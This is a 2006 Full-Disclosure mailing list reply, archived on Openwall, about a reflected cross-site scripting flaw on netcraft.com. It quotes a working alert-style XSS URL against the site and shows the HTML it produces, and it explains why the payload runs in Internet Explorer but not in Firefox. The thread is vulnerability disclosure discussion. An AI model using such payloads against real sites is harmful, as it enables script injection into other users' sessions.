lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Date: Thu, 3 Aug 2006 08:54:13 +0200
From: Denis Jedig <seclists@...eticon.de>
To: full-disclosure@...ts.grok.org.uk
Subject: Re: Re: XSS at Netcraft.com

On Wed, 2 Aug 2006 23:23:10 +0300 Valery Marchuk wrote:

> No they have not. XSS still exists.
> http://uptime.netcraft.com//netmove/today?mode=new%5Fsite&zero=0"><script>alert('www.securitylab.ru')</script>
> Just turn on JavaScript in your browser or turn off your firewall:)

You're right, I was too lazy to look at the resulting HTML. Firefox recodes
the URL to
| http://uptime.netcraft.com//netmove/today?mode=new%5Fsite&zero=0%22%3E%3Cscript%3Ealert('www.securitylab.ru')%3C/script%3E
before sending the request. The reference in question looks like this as a
result:
| <a href="http://www.netcraft.com/oldwhats?mode=new%5Fsite&zero=0%22%3E%3Cscript%3Ealert('www.securitylab.ru')%3C/script%3E">
and fails to get interpreted by the browser. However, IE does not recode
the URL sending the request "as is" giving the desired XSS:
| <a href="http://www.netcraft.com/oldwhats?mode=new%5Fsite&zero=0"><script>alert('www.securitylab.ru')</script>">

Denis

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ